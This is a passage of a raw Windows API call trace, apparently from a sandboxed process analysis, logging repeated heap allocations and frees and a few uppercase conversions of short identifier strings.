dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0149.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0149.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0149.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0149.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0149.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0149.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0149.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72578 [0149.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0149.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0149.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0149.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0149.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0149.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0149.430] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0149.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0149.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0149.430] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0149.439] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0149.439] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0149.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0149.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0149.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0149.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0149.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0149.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0149.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0149.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0149.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0149.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0149.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0149.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1e0 [0149.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0149.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0149.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0149.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0149.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0149.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0149.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0149.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0149.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0149.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0149.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0149.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0149.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0149.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0149.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0149.440] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0149.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0149.441] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0149.441] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0149.441] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0149.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0149.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0149.441] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0149.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0149.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0149.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa018 [0149.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0149.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0149.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0149.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0149.441] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0149.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0149.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0149.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa390 [0149.441] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0149.441] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0149.441] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0149.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0149.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0149.441] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0149.441] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0149.441] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0149.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9fe8 [0149.441] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0149.442] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72558 [0149.442] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0149.442] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4e0 [0149.442] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa510 [0149.442] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0149.442] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa528 [0149.442] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0149.442] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0149.442] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0149.442] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0149.442] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0149.442] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0149.442] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa528 | out: hHeap=0x2af0000) returned 1 [0149.442] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa510 | out: hHeap=0x2af0000) returned 1 [0149.442] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4e0 | out: hHeap=0x2af0000) returned 1 [0149.442] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0149.442] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0149.442] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e700 [0149.442] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0149.442] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72558 [0149.442] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0149.442] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0149.442] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0149.442] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0149.442] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0149.442] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa318 [0149.442] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74550 [0149.443] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0149.443] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0149.443] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa330 [0149.443] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa360 [0149.443] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0149.443] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa438 [0149.443] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0149.443] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0149.443] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0149.443] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0149.443] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0149.443] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0149.443] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa438 | out: hHeap=0x2af0000) returned 1 [0149.443] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa360 | out: hHeap=0x2af0000) returned 1 [0149.443] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa330 | out: hHeap=0x2af0000) returned 1 [0149.443] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0149.443] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0149.443] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0149.443] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0149.443] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0149.443] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0149.443] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa528 [0149.443] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa300 [0149.443] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0149.443] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3d8 [0149.443] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0149.444] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3d8 | out: hHeap=0x2af0000) returned 1 [0149.444] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0149.444] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa528 | out: hHeap=0x2af0000) returned 1 [0149.444] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0149.444] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0149.444] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74550 | out: hHeap=0x2af0000) returned 1 [0149.444] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa318 | out: hHeap=0x2af0000) returned 1 [0149.444] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0149.444] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70e0 [0149.444] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa450 [0149.444] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa378 [0149.444] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0149.444] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa258 [0149.444] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0149.444] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa258 | out: hHeap=0x2af0000) returned 1 [0149.444] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa378 | out: hHeap=0x2af0000) returned 1 [0149.444] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa450 | out: hHeap=0x2af0000) returned 1 [0149.444] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70e0 | out: hHeap=0x2af0000) returned 1 [0149.444] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0149.444] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0149.444] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0149.444] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0149.444] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0149.444] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72558 [0149.444] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0149.444] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0149.444] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0149.444] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa408 [0149.445] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74238 [0149.445] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72558 [0149.445] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0149.445] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4e0 [0149.445] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3f0 [0149.445] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0149.445] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3d8 [0149.445] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0149.445] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0149.445] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0149.445] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0149.445] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0149.445] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0149.445] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3d8 | out: hHeap=0x2af0000) returned 1 [0149.445] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3f0 | out: hHeap=0x2af0000) returned 1 [0149.445] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4e0 | out: hHeap=0x2af0000) returned 1 [0149.445] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0149.445] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0149.445] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0149.445] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0149.445] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72558 [0149.445] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2e8 [0149.445] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3a8 [0149.445] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0149.445] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3c0 [0149.445] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0149.445] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3c0 | out: hHeap=0x2af0000) returned 1 [0149.445] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0149.446] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0149.446] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0149.446] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72558 [0149.446] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3a8 [0149.446] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa420 [0149.446] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0149.446] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa3c0 [0149.446] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0149.446] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3c0 | out: hHeap=0x2af0000) returned 1 [0149.446] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa420 | out: hHeap=0x2af0000) returned 1 [0149.446] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0149.446] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0149.446] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74238 | out: hHeap=0x2af0000) returned 1 [0149.446] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa408 | out: hHeap=0x2af0000) returned 1 [0149.446] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72558 [0149.446] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0149.446] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0149.446] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fe8 | out: hHeap=0x2af0000) returned 1 [0149.446] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0149.446] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72558 [0149.446] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0149.446] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0149.446] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0149.446] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0149.446] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0149.446] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0149.447] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0149.447] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72558 [0149.447] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fe8 [0149.447] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa330 [0149.447] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0149.447] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0149.447] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0149.447] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0149.447] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0149.447] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0149.447] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa240 [0149.447] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0149.447] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0149.447] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0149.447] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0149.447] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0149.447] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0149.447] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa270 | out: hHeap=0x2af0000) returned 1 [0149.447] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2b8 | out: hHeap=0x2af0000) returned 1 [0149.447] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa258 | out: hHeap=0x2af0000) returned 1 [0149.447] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0149.447] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0149.447] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0149.447] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0149.447] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2a0 | out: hHeap=0x2af0000) returned 1 [0149.447] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0149.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa258 | out: hHeap=0x2af0000) returned 1 [0149.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0149.448] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 